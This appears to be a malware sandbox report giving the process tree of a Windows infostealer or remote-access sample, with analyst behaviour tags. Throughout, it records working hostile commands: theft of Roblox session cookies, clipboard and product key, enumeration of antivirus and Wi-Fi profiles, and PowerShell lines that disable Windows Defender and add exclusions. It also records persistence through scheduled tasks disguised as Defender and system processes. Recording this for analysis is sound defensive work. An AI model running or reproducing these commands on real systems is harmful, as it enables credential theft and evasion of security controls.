          - C:\Windows\System32\Wbem\WMIC.exe | WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Get-Clipboard | Suspicious behavior: EnumeratesProcesses
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\tasklist.exe | tasklist /FO LIST | Enumerates processes with tasklist
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F"
          - C:\Windows\system32\tree.com | tree /A /F
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          - C:\Windows\system32\netsh.exe | netsh wlan show profile
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "systeminfo"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\systeminfo.exe | systeminfo | Gathers system information
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 | Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
            - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m3wewmkx\m3wewmkx.cmdline"
              - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES10F3.tmp" "c:\Users\Admin\AppData\Local\Temp\m3wewmkx\CSC7F12B3BB14F747BC9A4D908E8B4E61AF.TMP"
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F"
          - C:\Windows\system32\tree.com | tree /A /F
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F"
          - C:\Windows\system32\tree.com | tree /A /F
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F"
          - C:\Windows\system32\tree.com | tree /A /F
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F"
          - C:\Windows\system32\tree.com | tree /A /F
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "tree /A /F"
          - C:\Windows\system32\tree.com | tree /A /F
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4832"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\taskkill.exe | taskkill /F /PID 4832 | Kills process with taskkill
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "getmac"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\getmac.exe | getmac
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1344"
          - C:\Windows\system32\taskkill.exe | taskkill /F /PID 1344 | Kills process with taskkill
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "taskkill /F /PID 732"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\taskkill.exe | taskkill /F /PID 732 | Kills process with taskkill
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4048"
          - C:\Windows\system32\taskkill.exe | taskkill /F /PID 4048 | Kills process with taskkill
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2448"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          - C:\Windows\system32\taskkill.exe | taskkill /F /PID 2448 | Kills process with taskkill
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | Suspicious use of SetWindowsHookEx
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | Suspicious use of SetWindowsHookEx
          - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        - C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28522\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\NCYlz.zip" *"
          - C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\_MEI28522\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI28522\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\NCYlz.zip" *6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7444 -s 3167⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Microsoft_M.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"5⤵
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 26⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"5⤵
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard6⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\tasklist.exetasklist /FO LIST6⤵
- Enumerates processes with tasklist
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"5⤵
-
C:\Windows\system32\netsh.exenetsh wlan show profile6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\systeminfo.exesysteminfo6⤵
- Gathers system information
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\upxeld10\upxeld10.cmdline"7⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES148D.tmp" "c:\Users\Admin\AppData\Local\Temp\upxeld10\CSC837FB41BEC594818A3959722F399BB9.TMP"8⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"5⤵
-
C:\Windows\system32\tree.comtree /A /F6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"5⤵
-
C:\Windows\system32\getmac.exegetmac6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4832"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 48326⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1344"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 13446⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 732"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 7326⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4048"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40486⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2448"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 24486⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5092"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 50926⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY6⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6092 -s 3527⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI36002\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\gncuo.zip" *"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Users\Admin\AppData\Local\Temp\_MEI36002\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI36002\rar.exe a -r -hp"1" "C:\Users\Admin\AppData\Local\Temp\gncuo.zip" *6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name6⤵
- Detects videocard installed
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault6⤵
-
C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"C:\Users\Admin\AppData\Local\Temp\Msvchost.exe"3⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft_WindowsDefender" /tr "C:\Users\Admin\AppData\Roaming\Microsoft_WindowsDefender.exe"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=124.0.6367.118 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=124.0.2478.80 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7fff8865ceb8,0x7fff8865cec4,0x7fff8865ced02⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1892,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=3228 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,6166776566165096562,4582328833313060853,262144 --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:82⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 8 /tr "'C:\Recovery\WindowsRE\TextInputHost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe'" /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\dllhost.exe'" /rl HIGHEST /f2⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
-
